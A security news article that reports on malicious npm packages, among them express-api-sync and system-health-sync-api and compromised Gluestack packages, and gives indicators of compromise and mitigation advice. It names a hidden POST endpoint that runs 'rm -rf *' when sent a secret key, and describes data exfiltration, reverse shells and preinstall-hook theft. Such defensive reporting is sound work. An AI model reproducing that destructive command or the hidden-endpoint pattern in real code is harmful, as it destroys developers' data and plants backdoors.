Two malicious npm packages, disguised as legitimate utilities, have been identified executing destructive actions against developer environments. The packages express-api-sync and system-health-sync-api were downloaded approximately 1,000 times before being removed from the registry, according to security researchers1.
Package Analysis and Malicious Behavior
The express-api-sync package contained hidden functionality that triggered file deletion commands (rm -rf *) through a concealed POST endpoint. This endpoint required a specific secret key (DEFAULT_123) to activate the destructive payload1. The second package, system-health-sync-api, exhibited more sophisticated behavior with multi-platform compatibility (Linux/Windows) and included data exfiltration capabilities. It collected system fingerprints and transmitted them to the email address [email protected]1.
Security analysts note the packages followed a consistent pattern of appearing legitimate while containing destructive payloads. The lack of financial motivation in these attacks suggests possible state-linked sabotage attempts rather than traditional cybercrime operations1.
Broader Supply Chain Threats
This incident coincides with reports of a separate npm supply chain attack affecting the Gluestack ecosystem. Sixteen compromised packages, including react-native-aria/focus and gluestack-ui/utils, were found containing obfuscated remote access trojans (RATs) in their lib/index.js files2. These packages collectively accounted for over 960,000 weekly downloads before detection.
The Gluestack attack payloads demonstrated advanced capabilities including file exfiltration and Windows PATH hijacking through fake Python paths. Researchers observed similarities to prior campaigns like biatec-avm-gas-station, suggesting possible connections to known threat actors2.
Technical Indicators and Detection
Security teams should monitor for these specific indicators of compromise:
| Package | Malicious Behavior | IOCs |
|---|---|---|
express-api-sync |
File deletion via POST endpoint | Secret key: DEFAULT_123 |
system-health-sync-api |
System fingerprinting & data exfiltration | Email: [email protected] |
Additional suspicious npm packages recently identified include ethers-provider2, which injected malicious code into local ethers installations to create persistent reverse shells3, and PayPal-targeting packages like oauth2-paypal that stole system data through preinstall hooks4.
Mitigation and Best Practices
Organizations should implement these protective measures:
- Conduct immediate audits of npm dependencies using tools like Socket.dev
- Review all installed packages for unexpected POST endpoints or data collection
- Monitor network traffic for connections to suspicious domains including
*.workers.dev - Implement strict package approval processes before installation
The discovery of these malicious packages highlights the growing sophistication of supply chain attacks targeting development environments. Security teams must maintain vigilance against seemingly legitimate packages that may contain hidden destructive capabilities.
References
- “Malicious npm Packages Posing as Utilities Delete Project Directories”, BleepingComputer, June 7, 2025.
- “Supply Chain Attack Hits Gluestack npm Packages with 960K Weekly Downloads”, BleepingComputer, June 7, 2025.
- “Malicious npm ‘Patch’ Delivers Reverse Shell”, ReversingLabs.
- “Malicious npm Packages Targeting PayPal Users”, FortiGuard Labs.
- “Fake npm Utilities Remotely Delete Entire App Directories”, SC Media.
- “Malicious PyPI, npm and Ruby Packages”, The Hacker News, June 2025.
